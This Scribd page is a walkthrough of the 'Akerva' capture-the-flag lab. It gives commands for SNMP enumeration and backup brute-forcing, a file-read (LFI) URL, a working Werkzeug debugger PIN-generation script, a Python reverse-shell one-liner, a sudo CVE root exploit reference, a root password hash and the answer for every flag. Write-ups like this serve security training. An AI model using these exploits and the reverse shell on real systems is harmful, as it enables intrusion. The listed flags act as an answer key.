Scribd Logo
Upload

Welcome to Scribd!

  • Akerva

    Uploaded by

    Jean Pierre
    1K views2 pages

    Original Title

    akerva

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    1K views2 pages

    Akerva

    Uploaded by

    Jean Pierre

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 2

    Plain Sight - uncomment the JS on the main site

    Take a Look Around - If you enumerated you would see snmp is open, this is going to
    be useful later as well, snmp-check -c public -v 2c 10.13.37.11 -d
    Dead Poets - Is going to take some work, but you have to enumerate
    http://10.13.37.11/backups/backup_202005195731.zip that timestamp is UTC it is
    generated every 17 minutes from the time the server was started, so looking at
    uptime I was able to generate timestamps and used wget to pass it to the server,
    once the zip is downloaded and unzipped the flag is in
    scripts/backup_every_17minutes.sh
    powershell to get zip backup:
    $continue = $true; while($continue) { $time=(get-
    date).ToUniversalTime().AddMinutes(+15).ToString("yyyyMMddHHmmss");write-host
    "trying http://10.13.37.11/backups/backup_$time.zip"; iwr -uri
    http://10.13.37.11/backups/backup_$time.zip -outfile backup_$time.zip; sleep 0.3}
    $continue = $true; while($continue) { $time=(get-
    date).ToUniversalTime().ToString("yyyyMMddHHmmss");write-host "trying
    http://10.13.37.11/backups/backup_$time.zip"; iwr -uri
    http://10.13.37.11/backups/backup_$time.zip -outfile backup_$time.zip; sleep 0.3}

    basic auth creds:


    aas:AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}

    Now You See Me - is in dev/space_dev.py


    Open Book - 10.13.37.11:5000/file?filename=/home/aas/flag.txt
    Say Friend and Enter - 10.13.37.11:5000/file?filename=/home/aas/.hiddenflag.txt
    Using https://www.daehee.com/werkzeug-console-pin-exploit/.. you can create a
    script to generate the pin to get onto the http://10.13.37.11:5000/console which
    can be used to get a shell python, use snmp to get the mac address,
    /usr/local/lib/python2.7/dist-packages/flask/app.pyc, aas, and the rest use
    http://10.13.37.11:5000/file?filename= to look it up
    use the following python script and update the values if needed:

    '''mac (hex): 005056b98ff7


    mac in string: 345052407282
    /usr/local/lib/python2.7/dist-packages/flask/app.pyc
    aas'''

    import hashlib
    from itertools import chain
    probably_public_bits = [
    'aas',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python2.7/dist-packages/flask/app.pyc' # getattr(mod,
    '__file__', None),
    ]

    private_bits = [
    '345052385271',# str(uuid.getnode()), /sys/class/net/ens33/address
    '258f132cd7e647caaf5510e3aca997c1'# get_machine_id(), /etc/machine-id
    ]

    h = hashlib.md5()
    for bit in chain(probably_public_bits, private_bits):
    if not bit:
    continue
    if isinstance(bit, str):
    bit = bit.encode('utf-8')
    h.update(bit)
    h.update(b'cookiesalt')
    #h.update(b'shittysalt')

    cookie_name = '__wzd' + h.hexdigest()[:20]

    num = None
    if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

    rv =None
    if rv is None:
    for group_size in 5, 4, 3:
    if len(num) % group_size == 0:
    rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
    for x in range(0, len(num), group_size))
    break
    else:
    rv = num

    print(rv)

    Use this for reverse shell:


    import
    socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((
    "IP",PORT));os.dup2(s.fileno(),0);
    os.dup2(s.fileno(),1);p=subprocess.call(["/bin/sh"]);

    upgrade your terminal as ssh is not possible:


    python -c 'import pty;pty.spawn("/bin/bash")'

    Super Mushroom - https://github.com/saleemrashid/sudo-cve-2019-18634 compile that,


    send it over to the box and execute to become root
    Little Secret - It is a vignere cipher...that is all I will say....hint is look at
    the port 80 website about big bang look how much they love space!
    http://10.13.37.11:5000/download <-- that is another page to show an error which
    gives server details

    Plain Sight => AKERVA{Ikn0w_F0rgoTTEN#CoMmeNts}


    Take a Look Around => AKERVA{IkN0w_SnMP@@@MIsconfigur@T!onS}
    Dead Poets => AKERVA{IKNoW###VeRbTamper!nG_==}
    Now You See Me => AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}
    Open Book => AKERVA{IKNOW#LFi_@_}
    Say Friend and Enter => AKERVA{IkNOW#=ByPassWerkZeugPinC0de!}
    Super Mushroom => AKERVA{IkNow_Sud0_sUckS!}
    Little Secret => AKERVA{IKNOOOWVIGEEENERRRE}

    Shadow hash:
    root:
    $6$JunTLSen$1U9hBqUlth4MwzOuFVSaDfEfFGxQgzRPfkbwHLXGp7Z84fGPkAsMcjFBDb43YS8h9wUNWdZ
    5TTJkSP4jKKI9g0:18301:0:99999:7:::

    You might also like